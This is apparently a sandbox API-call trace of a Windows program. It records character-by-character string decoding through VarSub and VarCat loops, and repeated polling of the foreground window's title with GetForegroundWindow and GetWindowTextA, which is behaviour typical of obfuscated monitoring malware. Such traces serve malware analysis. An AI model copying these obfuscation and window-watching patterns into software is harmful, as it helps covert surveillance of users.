WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.731] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.732] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.732] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.733] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.733] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.734] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.734] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.735] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.735] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.736] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.736] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.736] GetForegroundWindow () returned 0x1011a [0201.737] GetLastError () returned 0x0 [0201.737] SysStringLen (param_1=" ") returned 0xff [0201.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.737] SysStringLen (param_1=" ") returned 0xff [0201.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.737] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0201.737] GetLastError () returned 0x0 [0201.738] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.738] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0201.738] SysStringLen (param_1="FolderView") returned 0xb [0201.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FolderView", cchWideChar=12, lpMultiByteStr=0x11684fc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FolderView", lpUsedDefaultChar=0x0) returned 12 [0201.745] SetWindowTextA (hWnd=0x103c4, lpString="FolderView") returned 1 [0201.745] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0201.746] GetFocus () returned 0x0 [0201.746] lstrlenA (lpString="FolderView") returned 10 [0201.746] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0201.829] IsWindow (hWnd=0x103c4) returned 1 [0201.829] IsWindow (hWnd=0x103c4) returned 1 [0201.829] IsWindow (hWnd=0x103c4) returned 1 [0201.830] IsWindow (hWnd=0x103c4) returned 1 [0201.830] GetFocus () returned 0x0 [0201.830] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0201.830] GetFocus () returned 0x0 [0201.830] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10e1d20 [0201.830] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0xb, lParam=0x10e1d20) returned 0xa [0201.831] GetFocus () returned 0x0 [0201.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0201.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=11 | out: lpWideCharStr="FolderView") returned 11 [0201.831] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0201.831] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.832] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0201.833] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.833] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.833] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.834] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.834] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.835] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.835] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.837] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.837] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.837] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.838] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.838] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.838] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.839] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.839] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.840] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.840] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.840] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.841] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.841] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.842] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.842] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.842] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.843] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.843] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.844] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.844] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.845] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.845] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.846] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.846] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.846] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.847] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.847] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.847] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.848] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.848] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.849] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.849] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.850] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.850] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.851] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.851] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.853] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.853] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.854] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.854] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.854] GetForegroundWindow () returned 0x2035c [0201.854] GetLastError () returned 0x0 [0201.854] SysStringLen (param_1=" ") returned 0xff [0201.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.855] SysStringLen (param_1=" ") returned 0xff [0201.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.855] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.855] GetLastError () returned 0x0 [0201.855] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", 